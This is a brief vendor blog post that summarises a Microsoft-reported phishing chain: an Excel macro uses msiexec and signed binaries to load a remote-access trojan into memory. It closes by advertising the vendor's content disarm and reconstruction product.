A new set of tweets from Microsoft Security Intelligence walks through an attack that uses a number of built-in Windows toolsets to infect machines with the notorious malware.

Here’s how it works:

  1. The potential victim receives an email written in Korean containing an Excel spreadsheet as an attachment.
  2. When opened, the Excel file runs a macro that calls MSIexec.com
  3. MSIexec downloads a Microsoft Installer (MSI) file to be installed
  4. The MSI file contains a digitally signed executable (so it must be safe, right?) that decrypts and loads a second executable directly into memory
  5. The second executable downloads another digitally signed file, wsus.exe
  6. This file runs and loads the final payload – the FlawedArmmy RAT – into memory

Like 90% of successful malware attacks, the threat all starts with a socially engineered phishing email that the user clicks and, subsequently downloads the attachment.

All of this can be avoided with a CDR tool, such as CyberQuay’s next-gen CDR solution, that scans and disarms the harmful content in the attached Excel file. To learn more about how next-gen CDR technology protects businesses, click here.